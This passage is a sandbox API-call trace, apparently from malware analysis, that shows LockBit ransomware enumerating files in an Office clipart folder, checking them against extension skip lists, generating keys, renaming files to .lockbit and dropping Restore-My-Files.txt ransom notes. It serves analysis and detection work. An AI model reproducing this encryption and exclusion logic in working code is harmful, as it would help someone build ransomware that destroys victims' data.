(lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.879] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec395100, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xec395100, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x28ae, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00828_.WMF", cAlternateFileName="")) returned 1 [0175.879] lstrcmpiW (lpString1=".", lpString2="SO00828_.WMF") returned -1 [0175.879] lstrcmpiW (lpString1="..", lpString2="SO00828_.WMF") returned -1 [0175.879] PathFindExtensionW (pszPath="SO00828_.WMF") returned=".WMF" [0175.879] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.879] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.879] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.879] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.879] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.879] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.879] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.880] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.881] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.881] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00828_.WMF") returned -1 [0175.881] lstrcmpiW (lpString1="ntldr", lpString2="SO00828_.WMF") returned -1 [0175.881] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00828_.WMF") returned -1 [0175.881] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00828_.WMF") returned -1 [0175.881] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00828_.WMF") returned -1 [0175.881] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00828_.WMF") returned 1 [0175.881] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00828_.WMF") returned -1 [0175.882] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.882] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00828_.WMF") returned=".WMF" [0175.882] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.882] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.882] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.883] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.883] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.883] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.883] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00828_.WMF.lockbit") returned 72 [0175.883] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00828_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00828_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0175.884] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.884] malloc (_Size=0x40068) returned 0x3f70048 [0175.885] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=10414) returned 1 [0175.885] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0175.886] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.886] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.886] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0175.886] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0175.889] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00828_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00828_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.889] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.889] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.891] free (_Block=0x1fa2ed8) [0175.891] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00828_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.891] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.891] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.891] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce6bec00, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xce6bec00, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x36da, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00834_.WMF", cAlternateFileName="")) returned 1 [0175.891] lstrcmpiW (lpString1=".", lpString2="SO00834_.WMF") returned -1 [0175.891] lstrcmpiW (lpString1="..", lpString2="SO00834_.WMF") returned -1 [0175.891] PathFindExtensionW (pszPath="SO00834_.WMF") returned=".WMF" [0175.891] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.891] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.891] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.891] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.891] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.891] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.891] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.891] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.891] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.891] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.892] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.892] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.893] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00834_.WMF") returned -1 [0175.893] lstrcmpiW (lpString1="ntldr", lpString2="SO00834_.WMF") returned -1 [0175.893] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00834_.WMF") returned -1 [0175.893] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00834_.WMF") returned -1 [0175.893] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00834_.WMF") returned -1 [0175.893] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00834_.WMF") returned 1 [0175.893] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00834_.WMF") returned -1 [0175.893] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.894] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00834_.WMF") returned=".WMF" [0175.894] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.894] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.894] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.895] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.895] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.895] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.895] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.895] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.895] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.895] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.895] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00834_.WMF.lockbit") returned 72 [0175.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00834_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00834_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0175.896] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.896] malloc (_Size=0x40068) returned 0x3e70008 [0175.896] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=14042) returned 1 [0175.896] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0175.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.898] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0175.898] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0175.906] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00834_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00834_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.906] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.906] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.907] free (_Block=0x1fa2ed8) [0175.908] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00834_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.908] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.908] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.908] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc613b100, ftCreationTime.dwHighDateTime=0x1bd4b2e, ftLastAccessTime.dwLowDateTime=0x6d3324f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc613b100, ftLastWriteTime.dwHighDateTime=0x1bd4b2e, nFileSizeHigh=0x0, nFileSizeLow=0x3fe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00837_.WMF", cAlternateFileName="")) returned 1 [0175.908] lstrcmpiW (lpString1=".", lpString2="SO00837_.WMF") returned -1 [0175.908] lstrcmpiW (lpString1="..", lpString2="SO00837_.WMF") returned -1 [0175.908] PathFindExtensionW (pszPath="SO00837_.WMF") returned=".WMF" [0175.908] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.908] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.909] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.909] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.910] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00837_.WMF") returned -1 [0175.910] lstrcmpiW (lpString1="ntldr", lpString2="SO00837_.WMF") returned -1 [0175.910] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00837_.WMF") returned -1 [0175.910] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00837_.WMF") returned -1 [0175.910] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00837_.WMF") returned -1 [0175.910] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00837_.WMF") returned 1 [0175.910] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00837_.WMF") returned -1 [0175.910] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.910] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00837_.WMF") returned=".WMF" [0175.910] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.911] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.911] lstrcmpiW 